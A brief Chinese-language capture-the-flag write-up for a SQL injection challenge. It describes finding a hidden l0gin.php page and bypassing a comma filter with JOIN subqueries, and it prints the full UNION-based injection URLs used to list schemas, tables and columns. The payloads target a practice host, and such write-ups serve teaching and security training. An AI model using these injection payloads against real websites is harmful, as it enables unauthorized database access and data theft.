SQLi

这个题有一点坑。。

首先发现源代码有提示login.php?id=1，结果尝试了半天也没能注入。

后来发现index.php存在，并且header中发现正真的登录页面l0gin.php....擂主还是有点坑。

• 这里看wp才看出来。什么东西哦。
• http://c5a28a553a614a0b8eac9ffd468aa62d036b91b17a5f48f4.changame.ichunqiu.com/l0gin.php?id=2%27%20%23
  就是id=2' %23一测试就发现了注入点
• 用order by 测试发现是2
• 之后就是下面了
• 但是发现了逗号过滤
  所以用select * from (select version())a join (select database())b 语句来绕过

/l0gin.php?id=0%27%20union%20select%20*%20from%20(%20(select%20user())a%20JOIN%20(select%20group_concat(schema_name)%20from%20information_schema.schemata)b)%20%23 

information_schema,sqli


/l0gin.php?id=0%27%20union%20select%20*%20from%20(%20(select%20user())a%20JOIN%20(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3d'sqli')b)%20%23 


users

/l0gin.php?id=0%27%20union%20select%20*%20from%20(%20(select%20user())a%20JOIN%20(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name%3d'users')b)%20%23  


>id,username,flag_9c861b688330</td id,username,flag_9c861b688330